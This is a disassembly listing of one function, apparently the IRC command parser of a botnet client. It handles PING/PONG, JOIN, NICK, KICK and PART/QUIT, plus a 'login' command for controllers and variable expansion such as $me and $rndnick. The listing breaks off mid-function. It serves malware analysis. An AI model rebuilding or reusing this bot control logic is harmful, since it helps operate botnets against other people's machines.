var_C6 = word ptr -0C6h
var_C4 = dword ptr -0C4h
var_B8 = byte ptr -0B8h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_64 = byte ptr -64h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 2178h
call sub_412DD0
push ebx
push esi
push edi
mov esi, 80h
xor eax, eax
push 1Bh
push [ebp+arg_10]
xor ebx, ebx
mov ecx, esi
lea edi, [ebp+var_2E0]
rep stosd
lea eax, [ebp+var_3AC]
push eax
mov [ebp+var_1C], 3
mov [ebp+var_18], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_AC], ebx
call sub_412C40
add esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], ebx
jz loc_407B7D
mov ecx, esi
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea edi, [ebp+var_17E8]
rep stosd
lea eax, [ebp+var_17E8]
push eax
call sub_412C40
lea eax, [ebp+var_17E8]
push offset asc_4246B4 ; " :"
push eax
call sub_413920
mov [ebp+var_14], eax
push esi
lea eax, [ebp+var_17E8]
push eax
lea eax, [ebp+var_1BE8]
push eax
call sub_412C40
mov esi, offset asc_41FA74 ; " "
lea eax, [ebp+var_1BE8]
push esi
push eax
call sub_413859
xor edi, edi
add esp, 28h
mov [ebp+var_A4], eax
inc edi
loc_4079BA: ; CODE XREF: sub_4078FA+D4�j
push esi
push ebx
call sub_413859
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4079BA
mov ebx, [ebp+var_A4]
xor esi, esi
cmp ebx, esi
jz loc_407B7B
cmp [ebp+var_A0], esi
jz loc_407B7B
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_4AC]
push 1Fh
rep stosd
pop edx
loc_4079FC: ; CODE XREF: sub_4078FA+13A�j
lea ecx, [ebp+edx*4+var_A4]
mov eax, [ecx]
cmp eax, esi
jz short loc_407A33
cmp byte ptr [eax], 2Dh
jnz short loc_407A36
cmp byte ptr [eax+2], 0
jnz short loc_407A36
movsx edi, byte ptr [eax+1]
and byte ptr [eax], 0
and byte ptr [eax+1], 0
and byte ptr [eax+2], 0
mov [ecx], esi
mov ebx, [ebp+var_A4]
mov [ebp+edi+var_4AC], 1
loc_407A33: ; CODE XREF: sub_4078FA+10D�j
dec edx
jns short loc_4079FC
loc_407A36: ; CODE XREF: sub_4078FA+112�j
; sub_4078FA+118�j
cmp [ebp+var_439], 0
jz short loc_407A46
mov [ebp+var_C], 1
loc_407A46: ; CODE XREF: sub_4078FA+143�j
cmp [ebp+var_43E], 0
jz short loc_407A59
mov [ebp+var_C], esi
mov [ebp+var_4], 1
loc_407A59: ; CODE XREF: sub_4078FA+153�j
cmp byte ptr [ebx], 0Ah
jz short loc_407A93
push 7Fh
lea eax, [ebp+var_C04]
push ebx
push eax
call sub_412C40
push 17h
lea eax, [ebx+1]
push eax
lea eax, [ebp+var_E0]
push eax
call sub_412C40
lea eax, [ebp+var_E0]
push offset asc_4264C0 ; "!"
push eax
call sub_413859
add esp, 20h
loc_407A93: ; CODE XREF: sub_4078FA+162�j
push 5
mov edi, ebx
mov esi, offset aPing ; "PING"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_407AE1
push [ebp+var_A0]
mov byte ptr [ebx+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_404592
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp dword ptr [eax], 0
jnz loc_407B7B
loc_407AC9: ; CODE XREF: sub_4078FA+3DA�j
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_407AD4: ; CODE XREF: sub_4078FA+6D6�j
; sub_4078FA+93C�j ...
push [ebp+arg_4]
call sub_404592
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_407AE1: ; CODE XREF: sub_4078FA+1A7�j
mov edx, [ebp+var_A0]
push 4
pop eax
mov edi, edx
mov esi, offset a001 ; "001"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40D1A7
mov edi, edx
mov esi, offset a005 ; "005"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40D1A7
mov edi, edx
mov esi, offset a302 ; "302"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jnz short loc_407B44
push offset a@ ; "@"
push [ebp+var_98]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_407B7B
push 9Fh
inc eax
push eax
push [ebp+arg_1C]
jmp loc_407DE9
; ---------------------------------------------------------------------------
loc_407B44: ; CODE XREF: sub_4078FA+223�j
mov ecx, eax
mov edi, edx
mov esi, offset a433 ; "433"
xor eax, eax
repe cmpsb
jnz short loc_407B83
push eax
push dword_42AE68
push dword_42AE64
push [ebp+arg_10]
call sub_40E7B0
push [ebp+arg_10]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
add esp, 1Ch
loc_407B7B: ; CODE XREF: sub_4078FA+E0�j
; sub_4078FA+EC�j ...
xor eax, eax
loc_407B7D: ; CODE XREF: sub_4078FA+55�j
inc eax
loc_407B7E: ; CODE XREF: sub_4078FA+172D�j
; sub_4078FA+2E43�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407B83: ; CODE XREF: sub_4078FA+257�j
mov edi, [ebp+arg_18]
push 2
pop edx
loc_407B89: ; CODE XREF: sub_4078FA+2D0�j
lea eax, [ebp+var_C04]
mov esi, edi
loc_407B91: ; CODE XREF: sub_4078FA+2B3�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_407BB3
test cl, cl
jz short loc_407BAF
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_407BB3
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407B91
loc_407BAF: ; CODE XREF: sub_4078FA+2A1�j
xor eax, eax
jmp short loc_407BB8
; ---------------------------------------------------------------------------
loc_407BB3: ; CODE XREF: sub_4078FA+29D�j
; sub_4078FA+2AB�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407BB8: ; CODE XREF: sub_4078FA+2B7�j
test eax, eax
jnz short loc_407BC3
mov [ebp+var_20], 1
loc_407BC3: ; CODE XREF: sub_4078FA+2C0�j
add edi, 80h
dec edx
jnz short loc_407B89
mov edi, [ebp+var_A0]
push 5
mov esi, offset aKick ; "KICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407CD9
mov edi, [ebp+arg_18]
push 2
pop ebx
loc_407BEA: ; CODE XREF: sub_4078FA+396�j
cmp byte ptr [edi], 0
jz loc_407C89
push 7Fh
lea eax, [ebp+var_C04]
push edi
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_98], 0
jz short loc_407C89
mov esi, [ebp+var_98]
lea eax, [ebp+var_E0]
loc_407C1A: ; CODE XREF: sub_4078FA+33C�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407C3C
test cl, cl
jz short loc_407C38
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407C3C
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407C1A
loc_407C38: ; CODE XREF: sub_4078FA+32A�j
xor eax, eax
jmp short loc_407C41
; ---------------------------------------------------------------------------
loc_407C3C: ; CODE XREF: sub_4078FA+326�j
; sub_4078FA+334�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407C41: ; CODE XREF: sub_4078FA+340�j
test eax, eax
jnz short loc_407C89
and [edi], al
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
add esp, 20h
loc_407C89: ; CODE XREF: sub_4078FA+2F3�j
; sub_4078FA+312�j ...
add edi, 80h
dec ebx
jnz loc_407BEA
mov esi, [ebp+var_98]
mov eax, [ebp+arg_10]
loc_407C9F: ; CODE XREF: sub_4078FA+3C1�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407CC1
test cl, cl
jz short loc_407CBD
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407CC1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407C9F
loc_407CBD: ; CODE XREF: sub_4078FA+3AF�j
xor eax, eax
jmp short loc_407CC6
; ---------------------------------------------------------------------------
loc_407CC1: ; CODE XREF: sub_4078FA+3AB�j
; sub_4078FA+3B9�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407CC6: ; CODE XREF: sub_4078FA+3C5�j
test eax, eax
jnz loc_407B7B
mov eax, [ebp+arg_20]
and dword ptr [eax], 0
jmp loc_407AC9
; ---------------------------------------------------------------------------
loc_407CD9: ; CODE XREF: sub_4078FA+2E4�j
mov edi, [ebp+var_A0]
push 5
mov esi, offset aNick ; "NICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407EB9
mov eax, [ebp+var_9C]
or [ebp+var_1C], 0FFFFFFFFh
mov ebx, [ebp+arg_18]
inc eax
sub [ebp+var_1C], eax
mov [ebp+arg_0], eax
mov [ebp+var_20], 2
loc_407D0C: ; CODE XREF: sub_4078FA+4A3�j
lea eax, [ebp+var_C04]
mov esi, ebx
loc_407D14: ; CODE XREF: sub_4078FA+436�j
mov dl, [esi]
mov cl, dl
cmp dl, [eax]
jnz short loc_407D36
test cl, cl
jz short loc_407D32
mov dl, [esi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_407D36
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407D14
loc_407D32: ; CODE XREF: sub_4078FA+424�j
xor eax, eax
jmp short loc_407D3B
; ---------------------------------------------------------------------------
loc_407D36: ; CODE XREF: sub_4078FA+420�j
; sub_4078FA+42E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407D3B: ; CODE XREF: sub_4078FA+43A�j
test eax, eax
jnz short loc_407D94
lea eax, [ebp+var_C04]
push 21h
push eax
call sub_413F30
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_407D94
mov eax, [ebp+var_1C]
mov edx, [ebp+arg_0]
lea ecx, [ebx+2]
mov byte ptr [ebx], 3Ah
lea esi, [eax+ecx]
loc_407D64: ; CODE XREF: sub_4078FA+472�j
mov al, [edx]
mov [esi+edx], al
inc edx
test al, al
jnz short loc_407D64
mov eax, edi
mov esi, edi
loc_407D72: ; CODE XREF: sub_4078FA+47D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_407D72
sub eax, esi
dec ecx
loc_407D7C: ; CODE XREF: sub_4078FA+488�j
mov dl, [ecx+1]
inc ecx
test dl, dl
jnz short loc_407D7C
mov edi, ecx
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_407D94: ; CODE XREF: sub_4078FA+443�j
; sub_4078FA+459�j
add ebx, 80h
dec [ebp+var_20]
jnz loc_407D0C
cmp [ebp+arg_0], 0
jz loc_407B7B
mov esi, [ebp+arg_10]
lea eax, [ebp+var_E0]
loc_407DB6: ; CODE XREF: sub_4078FA+4D8�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407DD8
test cl, cl
jz short loc_407DD4
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407DD8
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407DB6
loc_407DD4: ; CODE XREF: sub_4078FA+4C6�j
xor eax, eax
jmp short loc_407DDD
; ---------------------------------------------------------------------------
loc_407DD8: ; CODE XREF: sub_4078FA+4C2�j
; sub_4078FA+4D0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407DDD: ; CODE XREF: sub_4078FA+4DC�j
test eax, eax
jnz short loc_407DF6
push 0Fh
push [ebp+arg_0]
push [ebp+arg_10]
loc_407DE9: ; CODE XREF: sub_4078FA+245�j
call sub_412C40
add esp, 0Ch
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407DF6: ; CODE XREF: sub_4078FA+4E5�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_407DFB: ; CODE XREF: sub_4078FA+543�j
cmp byte ptr [edx], 0
jz short loc_407E33
lea eax, [ebp+var_C04]
mov esi, edx
loc_407E08: ; CODE XREF: sub_4078FA+52A�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_407E2A
test cl, cl
jz short loc_407E26
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_407E2A
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407E08
loc_407E26: ; CODE XREF: sub_4078FA+518�j
xor eax, eax
jmp short loc_407E2F
; ---------------------------------------------------------------------------
loc_407E2A: ; CODE XREF: sub_4078FA+514�j
; sub_4078FA+522�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407E2F: ; CODE XREF: sub_4078FA+52E�j
test eax, eax
jz short loc_407E44
loc_407E33: ; CODE XREF: sub_4078FA+504�j
inc edi
add edx, 80h
cmp edi, 2
jl short loc_407DFB
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407E44: ; CODE XREF: sub_4078FA+537�j
lea eax, [ebp+var_C04]
push 21h
push eax
call sub_413F30
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_407B7B
mov ecx, [ebp+arg_0]
lea edx, [ecx+1]
loc_407E64: ; CODE XREF: sub_4078FA+56F�j
mov al, [ecx]
inc ecx
test al, al
jnz short loc_407E64
sub ecx, edx
mov edx, ebx
lea esi, [edx+1]
loc_407E72: ; CODE XREF: sub_4078FA+57D�j
mov al, [edx]
inc edx
test al, al
jnz short loc_407E72
sub edx, esi
add edx, ecx
cmp edx, 7Eh
ja loc_407B7B
push ebx
push [ebp+arg_0]
shl edi, 7
add edi, [ebp+arg_18]
push offset aSS_2 ; ":%s%s"
push edi
call sub_412BB5
push 0
push 0
lea eax, [ebp+var_410]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407EB9: ; CODE XREF: sub_4078FA+3F1�j
mov edi, [ebp+var_A0]
mov ebx, offset aPart ; "PART"
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_407EE3
mov edi, [ebp+var_A0]
push 5
mov esi, offset aQuit ; "QUIT"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_407F33
loc_407EE3: ; CODE XREF: sub_4078FA+5D3�j
mov esi, [ebp+arg_18]
xor eax, eax
mov [ebp+var_10], esi
loc_407EEB: ; CODE XREF: sub_4078FA+637�j
cmp byte ptr [esi], 0
jz short loc_407F21
mov edi, [ebp+var_A4]
loc_407EF6: ; CODE XREF: sub_4078FA+618�j
mov dl, [esi]
mov cl, dl
cmp dl, [edi]
jnz short loc_407F18
test cl, cl
jz short loc_407F14
mov dl, [esi+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_407F18
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_407EF6
loc_407F14: ; CODE XREF: sub_4078FA+606�j
xor ecx, ecx
jmp short loc_407F1D
; ---------------------------------------------------------------------------
loc_407F18: ; CODE XREF: sub_4078FA+602�j
; sub_4078FA+610�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_407F1D: ; CODE XREF: sub_4078FA+61C�j
test ecx, ecx
jz short loc_407F76
loc_407F21: ; CODE XREF: sub_4078FA+5F4�j
mov esi, [ebp+var_10]
inc eax
add esi, 80h
cmp eax, 2
mov [ebp+var_10], esi
jl short loc_407EEB
loc_407F33: ; CODE XREF: sub_4078FA+5E7�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset a353 ; "353"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407FF7
mov esi, [ebp+var_94]
mov eax, [ebp+arg_8]
loc_407F54: ; CODE XREF: sub_4078FA+676�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407FD5
test cl, cl
jz short loc_407F72
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407FD5
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407F54
loc_407F72: ; CODE XREF: sub_4078FA+664�j
xor eax, eax
jmp short loc_407FDA
; ---------------------------------------------------------------------------
loc_407F76: ; CODE XREF: sub_4078FA+625�j
mov ecx, [ebp+arg_18]
shl eax, 7
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
mov edi, [ebp+var_A0]
add esp, 10h
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407B7B
lea eax, [ebp+var_2E0]
push eax
mov eax, [ebp+var_A4]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_407FD5: ; CODE XREF: sub_4078FA+660�j
; sub_4078FA+66E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407FDA: ; CODE XREF: sub_4078FA+67A�j
test eax, eax
jnz short loc_407FE7
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_407FE7: ; CODE XREF: sub_4078FA+6E2�j
push [ebp+var_94]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_407FF7: ; CODE XREF: sub_4078FA+64B�j
mov edi, [ebp+var_A0]
mov eax, offset aPrivmsg ; "PRIVMSG"
push 8
xor edx, edx
mov esi, eax
pop ecx
repe cmpsb
mov edx, offset aNotice ; "NOTICE"
jz short loc_408047
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor ebx, ebx
repe cmpsb
jz short loc_408047
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40CFE2
cmp dword_42AE50, ebx
jz loc_40CFE2
loc_408047: ; CODE XREF: sub_4078FA+716�j
; sub_4078FA+727�j
mov edi, [ebp+var_A0]
mov ebx, [ebp+var_1C]
mov esi, eax
push 8
pop ecx
xor eax, eax
repe cmpsb
jz loc_40814C
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jz loc_40814C
mov eax, [ebp+var_98]
inc [ebp+var_94]
mov [ebp+var_1C], 4
mov [ebp+var_9C], eax
loc_40808D: ; CODE XREF: sub_4078FA+910�j
; sub_4078FA+94F�j ...
mov ebx, [ebp+var_1C]
shl ebx, 2
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
lea edx, [ecx+1]
mov [eax], edx
mov al, byte_42AE5C
cmp [ecx], al
mov [ebp+var_A8], edx
jnz loc_407B7B
push 6
mov edi, edx
mov esi, offset aLogin ; "login"
pop ecx
xor eax, eax
repe cmpsb
jz loc_40CFEA
push 2
mov edi, edx
mov esi, offset dword_4263E8
pop ecx
xor eax, eax
repe cmpsb
jz loc_40CFEA
cmp [ebp+var_20], eax
jnz short loc_4080F9
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40CFE2
loc_4080F9: ; CODE XREF: sub_4078FA+7E5�j
xor eax, eax
cmp [ebp+arg_28], eax
jnz loc_40CFE2
cmp dword_42B280, eax
mov [ebp+var_10], eax
jle loc_408417
mov [ebp+var_8], offset dword_479030
loc_40811A: ; CODE XREF: sub_4078FA+99A�j
mov edi, [ebp+var_8]
mov esi, edx
loc_40811F: ; CODE XREF: sub_4078FA+849�j
mov cl, [edi]
mov al, cl
cmp cl, [esi]
jnz loc_408278
test al, al
jz short loc_408145
mov cl, [edi+1]
mov al, cl
cmp cl, [esi+1]
jnz loc_408278
inc edi
inc edi
inc esi
inc esi
test al, al
jnz short loc_40811F
loc_408145: ; CODE XREF: sub_4078FA+833�j
xor eax, eax
jmp loc_40827D
; ---------------------------------------------------------------------------
loc_40814C: ; CODE XREF: sub_4078FA+75F�j
; sub_4078FA+774�j
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_408164
mov [ebp+var_4], 1
loc_408164: ; CODE XREF: sub_4078FA+861�j
cmp [ebp+var_9C], 0
jz loc_407B7B
push offset dword_4263E4
push [ebp+var_9C]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40818D
cmp [ebp+var_4], 0
jz short loc_408199
loc_40818D: ; CODE XREF: sub_4078FA+88B�j
lea eax, [ebp+var_E0]
mov [ebp+var_9C], eax
loc_408199: ; CODE XREF: sub_4078FA+891�j
cmp [ebp+var_98], 0
jz loc_407B7B
inc [ebp+var_98]
jz short loc_4081E8
cmp [ebp+arg_10], 0
jz short loc_4081E8
lea eax, [ebp+var_3AC]
lea edx, [eax+1]
loc_4081BD: ; CODE XREF: sub_4078FA+8C8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4081BD
sub eax, edx
push eax
push [ebp+var_98]
lea eax, [ebp+var_3AC]
push eax
call sub_414380
add esp, 0Ch
mov ebx, eax
neg ebx
sbb ebx, ebx
add ebx, 4
mov [ebp+var_1C], ebx
loc_4081E8: ; CODE XREF: sub_4078FA+8B2�j
; sub_4078FA+8B8�j
mov eax, ebx
shl eax, 2
mov edx, [ebp+eax+var_A4]
test edx, edx
jz loc_407B7B
push 0Ah
mov edi, edx
mov esi, offset dword_4263D8
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40808D
mov esi, [ebp+var_9C]
mov bl, [esi]
cmp bl, 23h
jz short loc_40823B
mov ecx, dword_479BBC
mov ecx, off_42AF40[ecx*4]
cmp byte ptr [ecx], 0
jz short loc_40823B
push ecx
push esi
push offset dword_4263BC
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_40823B: ; CODE XREF: sub_4078FA+921�j
; sub_4078FA+933�j
mov edi, edx
push 6
mov esi, offset dword_4263B4
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40808D
mov eax, [ebp+eax+var_A0]
test eax, eax
jz loc_40808D
cmp bl, 23h
jz loc_40808D
push eax
push [ebp+var_9C]
push offset dword_42639C
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_408278: ; CODE XREF: sub_4078FA+82B�j
; sub_4078FA+83D�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40827D: ; CODE XREF: sub_4078FA+84D�j
test eax, eax
jz short loc_40829F
inc [ebp+var_10]
mov eax, [ebp+var_10]
add [ebp+var_8], 0B8h
cmp eax, dword_42B280
jl loc_40811A
jmp loc_408417
; ---------------------------------------------------------------------------
loc_40829F: ; CODE XREF: sub_4078FA+985�j
push offset asc_4246B4 ; " :"
push [ebp+arg_0]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_407B7B
mov esi, [ebp+var_10]
mov cl, byte_42AE5C
imul esi, 0B8h
mov [eax+2], cl
mov cl, byte_42AE5C
mov [eax+3], cl
push 9Fh
lea ecx, dword_479048[esi]
push ecx
add eax, 4
push eax
call sub_412C40
lea eax, dword_479030[esi]
lea edi, [ebp+ebx+var_64]
add esp, 0Ch
mov [ebp+var_10], 0Fh
mov [ebp+var_AC], eax
mov esi, edi
loc_408302: ; CODE XREF: sub_4078FA+AAF�j
push [ebp+var_10]
lea eax, [ebp+var_B8]
push offset aD_1 ; "$%d-"
push eax
call sub_412BB5
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_413920
add esp, 14h
test eax, eax
jz short loc_40836E
cmp dword ptr [esi], 0
jz short loc_408373
mov eax, [ebp+var_AC]
lea edx, [eax+1]
loc_40833A: ; CODE XREF: sub_4078FA+A45�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40833A
sub eax, edx
add [ebp+var_14], eax
jz short loc_40839F
push dword ptr [esi-4]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40839F
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 0Ch
jmp short loc_40839F
; ---------------------------------------------------------------------------
loc_40836E: ; CODE XREF: sub_4078FA+A30�j
cmp dword ptr [esi], 0
jnz short loc_40839F
loc_408373: ; CODE XREF: sub_4078FA+A35�j
push 2
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_24]
push eax
call sub_412C40
and [ebp+var_22], 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 18h
loc_40839F: ; CODE XREF: sub_4078FA+A4C�j
; sub_4078FA+A5D�j ...
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg loc_408302
mov [ebp+var_10], 10h
mov esi, edi
loc_4083B8: ; CODE XREF: sub_4078FA+B0B�j
push [ebp+var_10]
lea eax, [ebp+var_B8]
push offset aD_0 ; "$%d"
push eax
call sub_412BB5
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_413920
add esp, 14h
test eax, eax
jz short loc_4083FB
mov eax, [esi]
test eax, eax
jz short loc_4083FB
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 0Ch
loc_4083FB: ; CODE XREF: sub_4078FA+AE6�j
; sub_4078FA+AEC�j
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg short loc_4083B8
mov edx, [ebp+var_A8]
mov [ebp+var_AC], 1
loc_408417: ; CODE XREF: sub_4078FA+813�j
; sub_4078FA+9A0�j
mov al, byte_42AE5C
cmp [edx], al
jz short loc_40842D
cmp [ebp+var_AC], 0
jz loc_408609
loc_40842D: ; CODE XREF: sub_4078FA+B24�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_40556E
lea eax, [ebp+var_E0]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_40556E
push [ebp+var_9C]
push offset aChan ; "$chan"
push edi
call sub_40556E
push 0
push 0
lea eax, [ebp+var_B8]
push 2
push eax
call sub_40E7B0
push eax
push offset aRndnick_0 ; "$rndnick"
push edi
call sub_40556E
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_40556E
mov esi, offset aChr ; "$chr("
push esi
push edi
call sub_413920
add esp, 14h
jmp loc_40858D
; ---------------------------------------------------------------------------
loc_4084A4: ; CODE XREF: sub_4078FA+C95�j
push esi
push [ebp+arg_0]
call sub_413920
mov [ebp+var_A8], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B8]
push eax
call sub_412C40
lea eax, [ebp+var_B8]
push offset asc_42635C ; ")"
push eax
call sub_413859
add esp, 1Ch
cmp [ebp+var_B8], 30h
jl short loc_4084EB
cmp [ebp+var_B8], 39h
jle short loc_408501
loc_4084EB: ; CODE XREF: sub_4078FA+BE6�j
push 3
lea eax, [ebp+var_B8]
push offset a63 ; "63"
push eax
call sub_412C40
add esp, 0Ch
loc_408501: ; CODE XREF: sub_4078FA+BEF�j
lea eax, [ebp+var_B8]
push eax
call sub_412F42
test eax, eax
pop ecx
jle short loc_408524
lea eax, [ebp+var_B8]
push eax
call sub_412F42
pop ecx
mov [ebp+var_24], al
jmp short loc_408535
; ---------------------------------------------------------------------------
loc_408524: ; CODE XREF: sub_4078FA+C16�j
call sub_412D71
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_24], dl
loc_408535: ; CODE XREF: sub_4078FA+C28�j
and [ebp+var_23], 0
lea eax, [ebp+var_B8]
lea edx, [eax+1]
loc_408542: ; CODE XREF: sub_4078FA+C4D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_408542
sub eax, edx
mov ecx, eax
xor eax, eax
lea edi, [ebp+var_B8]
stosd
stosd
add ecx, 6
push ecx
push [ebp+var_A8]
stosd
lea eax, [ebp+var_B8]
push eax
call sub_412C40
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
push esi
push [ebp+arg_0]
call sub_413920
add esp, 20h
loc_40858D: ; CODE XREF: sub_4078FA+BA5�j
test eax, eax
jnz loc_4084A4
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_17E8]
push eax
call sub_412C40
push esi
lea eax, [ebp+var_17E8]
push eax
lea eax, [ebp+var_1BE8]
push eax
call sub_412C40
mov esi, offset asc_41FA74 ; " "
